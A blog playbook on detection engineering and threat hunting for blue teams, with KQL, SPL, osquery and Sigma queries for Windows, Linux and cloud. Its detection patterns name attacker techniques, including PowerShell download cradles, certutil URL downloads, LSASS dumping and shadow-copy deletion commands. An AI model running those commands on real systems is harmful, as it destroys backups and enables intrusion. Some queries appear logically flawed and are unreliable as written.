Detection & Hunting — A Complete Technical Playbook for Modern Defenders By CyberDudeBivash — precise, engineering-grade threat intel for blue teams.

Executive summary

Detection and hunting are how defenders turn telemetry into decisions. Detection engineering codifies known bad (TTPs) into reliable, low-noise analytics. Threat hunting is the hypothesis-driven search for the unknown using context, anomaly signals, and analyst intuition. This playbook gives you a production-ready approach: what data to collect, how to shape it, patterns to detect, practical queries for Windows/Linux/Cloud, hunting workflows, quality gates, and KPIs.


1) Foundations: detection vs hunting

  • Detection engineering: repeatable analytics (“detections-as-code”) with tests, owners, deployment pipelines, and SLAs. Output = alerts.
  • Threat hunting: iterative investigations without waiting for alerts. Output = new detections, intel, hardening tasks.

Both share the same raw materials: telemetry → normalization → enrichment → analytics → action.


2) Telemetry strategy (Minimal Viable Telemetry)

Endpoint

  • Process: parent/child, full command line, integrity level, hashes, signer, image path.
  • File: create/rename/delete, entropy, extension/type mismatch.
  • Registry (Win): run keys, services, LSA providers.
  • Network: per-process flows (dst, port, bytes, JA3/JA4, SNI/host).
  • Memory: module loads, injection indicators (RWX, VirtualAllocExCreateRemoteThread).

Identity & SaaS

  • Auth logs: success/fail, MFA, geo, device posture, risk flags.
  • OAuth: consent grants, new app registrations, token lifetimes/scopes.
  • Mail/Drive/Share: sharing changes, mass downloads/deletes.

Cloud

  • Control plane: IAM changes, policy updates, key usage.
  • Data plane: object access, egress byte deltas.
  • Compute: metadata service access, container exec/priv-esc, unusual images.

Network (sensor or cloud PCAP/flow)

  • DNS (query name, NXDomain rate, TTL), HTTP (host, path, UA), TLS (SNI, JA3/JA4), NetFlow.

Normalize with a schema (ECS/OSSEM) and time-sync everything (NTP). Enrich with asset/owner tagsGeoIP/ASNthreat intelprocess reputation.


3) Detection engineering lifecycle

  1. Hypothesis/TTP (map to ATT&CK sub-technique).
  2. Data contract (fields required, sources).
  3. Rule/analytic (KQL/SPL/Sigma/EQL).
  4. Tests: unit (synthetic logs), replay (pcaps/evt), adversary emulation (Atomic Red Team).
  5. Quality gates: data freshness, field completeness, cardinality limits, false-positive review.
  6. Deploy with detections-as-code (Git + CI/CD). Track ownerSLAMTTD/PPV (precision).

Tip: write detections around behaviors, not hashes. Hashes rot; TTPs persist.


4) Core behavioral patterns (with ready-to-use analytics)

A) Initial access & execution (Windows)

Suspicious PowerShell (download/execution, AMSI bypass attempts)

kustoCopyEditDeviceProcessEvents
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| where ProcessCommandLine has_any ("IEX","DownloadString","FromBase64String","-enc","AMSI","Add-MpPreference","Bypass")
| extend Parent=InitiatingProcessFileName
| project Timestamp, DeviceName, AccountName, Parent, FileName, ProcessCommandLine

LOLBin abuse

  • rundll32mshtawmiccertutilbitsadmin launching network connections or scripts.

B) Persistence & privilege escalation

New auto-start extensibility points

kustoCopyEditDeviceRegistryEvents
| where ActionType in ("RegistryValueSet","RegistryKeyCreated")
| where RegistryKey has_any (
 @"\Software\Microsoft\Windows\CurrentVersion\Run",
 @"\Services", @"\Policies\System\Shell"
)

Service installs from user-writable paths

kustoCopyEditDeviceProcessEvents
| where FileName in ("sc.exe","powershell.exe")
| where ProcessCommandLine has "create" and ProcessCommandLine has " binPath="
| where ProcessCommandLine has_any ("\\AppData\\","\\Temp\\",".\\")

C) Credential access & discovery

Suspicious LSASS access

kustoCopyEditDeviceProcessEvents
| where ProcessCommandLine has "lsass"
    or (ProcessIntegrityLevel != "System" and
        InitiatingProcessFileName !in ("procexp64.exe") and
        ProcessCommandLine has_any ("ReadProcessMemory","MiniDump"))

Kerberoasting prep

kustoCopyEditSigninLogs
| where ResultType == 0 and AuthenticationRequirement == "singleFactorAuthentication"
| where AppDisplayName has "Kerberos" and ServicePrincipalName has ":"
| summarize count() by UserPrincipalName, bin(TimeGenerated, 15m)
| where count_ > 50

D) Lateral movement

WMI/PSRemoting from workstations

kustoCopyEditDeviceProcessEvents
| where FileName in ("wmic.exe","winrs.exe","powershell.exe")
| where RemoteUrl != "" and InitiatingProcessAccountDomain != "SERVER"

E) Command & control / beaconing

Flow periodicity & low-and-slow

splCopyEdit| tstats `summariesonly` count, avg(_time) as avg_t BY dest, src, dest_port, app span=1m
| timechart span=1m count BY dest
| eval jitter=stdev(count)/avg(count)
| where jitter < 0.15 AND avg(count) < 2

(Flag regular intervals with small jitter + small volume → beacon suspects.)

F) Exfiltration

DNS tunneling heuristic

splCopyEdit| stats count, avg(len(query)) as avglen, values(rcode) as r, dc(count) as uniq by src_ip
| where avglen > 40 OR uniq > 500

Sudden egress spike to new ASN

kustoCopyEditDeviceNetworkEvents
| summarize bytes=sum(ReportBytesSent) by DeviceId, RemoteIP, ASN, bin(Timestamp, 10m)
| extend z = (bytes - avg(bytes) over (partition by DeviceId range between 6h preceding and current row))
             / stdev(bytes) over (partition by DeviceId range between 6h preceding and current row)
| where z > 6 and ASN !in ("YourTrustedCDN","CorpProxy")

G) Ransomware staging

  • Rapid file rename/write with high entropy, shadow copy deletion, suspicious backup/defender tampering.
kustoCopyEditDeviceProcessEvents
| where ProcessCommandLine has_any ("vssadmin delete shadows","wbadmin delete","bcdedit /set recoveryenabled No")

5) Linux & macOS essentials

Linux: new listener by an unusual binary

bashCopyEdit# osquery
SELECT p.pid, p.path, l.port, l.address
FROM processes p JOIN listening_ports l ON p.pid=l.pid
WHERE p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/bin/%';

Linux: privilege escalation surfaces

  • sudoers edits, setuid bit changes, unprivileged eBPF use, ld.so.preloadcron entries in user writeable dirs.

macOS: persistence

  • LaunchAgents/LaunchDaemons from ~/Library/LaunchAgents/ with network reach-outs; unsigned binaries allowed via user click → hunt Gatekeeper bypass traces.

6) Cloud detections that matter

Azure AD risky impossible travel

kustoCopyEditlet baseline = SigninLogs
| summarize make_set(Country) by UserPrincipalName;
SigninLogs
| summarize first(TimeGenerated) as firstSeen, make_set(Country) by UserPrincipalName, bin(TimeGenerated, 1h)
| join kind=inner baseline on UserPrincipalName
| where array_length(set_Country) > 1 and datetime_diff("hour", min(TimeGenerated), max(TimeGenerated)) < 1

AWS key misuse

  • AccessKey used from new ASN + S3 List/Get flood + CloudTrail DeleteTrail attempts → high-risk triage.
sqlCopyEdit-- Athena/CloudTrail Lake (pseudo)
SELECT userIdentity.accessKeyId, COUNT(*) c
FROM cloudtrail
WHERE eventSource='s3.amazonaws.com' AND eventName in ('GetObject','ListBucket')
AND src_ip NOT IN (SELECT ip FROM allowlist)
GROUP BY 1
HAVING c > 5000;

GCP service account drift

  • New key creation followed by BigQuery export → egress monitor around the key’s first use.

7) Threat hunting workflow (4-hour cycle)

  1. Choose a seed: a TTP (e.g., DLL sideloading), an anomaly (new JA3), or new intel (domain set).
  2. State a hypothesis: “We will find unsigned binaries sideloaded by Office spawning rundll32 with network egress.”
  3. Scoping queries: broad → narrow. Save notebooks (Jupyter + MSTICPy/SQL/SPL).
  4. Pivot: by parent process, user, host, ASN, signer, hash cluster, JA3 cluster.
  5. Document leads: promote to detection if repeatable; file hardening/IR tickets if real risk.
  6. Retro hunt (30–90 days) for newly found IOCs/TTPs.

Add a hunt register: hypothesis, coverage, queries, outcomes, follow-ups.


8) Machine learning that actually helps

  • Outlier/anomaly: z-scores/Isolation Forest on per-host command counts, child-process trees, DNS lengths.
  • Beacon detection: spectral analysis (FFT) on inter-arrival times.
  • Clustering: group command lines (TF-IDF + HDBSCAN) to surface “weird” exec strings.
  • Graph features: user–host–process graphs; detect unusual edges.

Guardrails: strict explainabilityfeedback loops to analysts, and feature drift monitors. Use ML to prioritize and suggest pivots, not to auto-close cases.


9) Detections-as-code: quality & testing

  • Repo layout: /detections/<domain>/<technique>/<rule>.yml (Sigma), with test fixtures, sample logs, owners.
  • Pre-merge CI: schema lint, data-contract checks, simulated log replays, expected FP rate vs baseline.
  • Post-deploy canary: 1–5% of fleet; compare alert precision; auto-rollback if PPV < threshold.

Coverage KPIs

  • % ATT&CK TTPs with at least one high-confidence analytic.
  • Alert PPV (precision) per rule, MTTDMTTRtime-to-contain.
  • Data completeness (non-null critical fields) and ingest latency.

10) Triage cheatsheet (first 10 minutes)

  • Confirm behavior: execution + network + persistence? (Need ≥2 to escalate.)
  • Scope blast radius: same user, same signer, same JA3, same ASN.
  • Kill-chain phase: access, discovery, C2, actions on objectives → match controls.
  • Decide action: isolate host / block token / revoke OAuth consent / disable key / block domain.
  • Create feedback: If benign, write suppression rule with rationale and expiry.

Appendices

A) Sigma example — Suspicious CertUtil

yamlCopyEdittitle: Suspicious CertUtil With URL Download
id: 3b9d2a23-2f68-4c3f-86e4-certexample
status: stable
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - ' -urlcache '
      - ' -split '
      - 'http'
  condition: selection
level: high
tags: [attack.defense-evasion, attack.t1105]

B) Zeek hunting cues

  • weird.log: excessive trunc/rexmit → C2/bad middleboxes.
  • conn.log: periodic orig_pkts=1 resp_pkts=1 pairs.
  • dns.log: long labels, high NXDomain ratio.

Final word

Great security teams ship detections and iterate through hunts. Make telemetry trustworthy, codify behaviors, test relentlessly, and measure outcomes. Everything else is noise.

— CyberDudeBivash

Leave a comment

Design a site like this with WordPress.com
Get started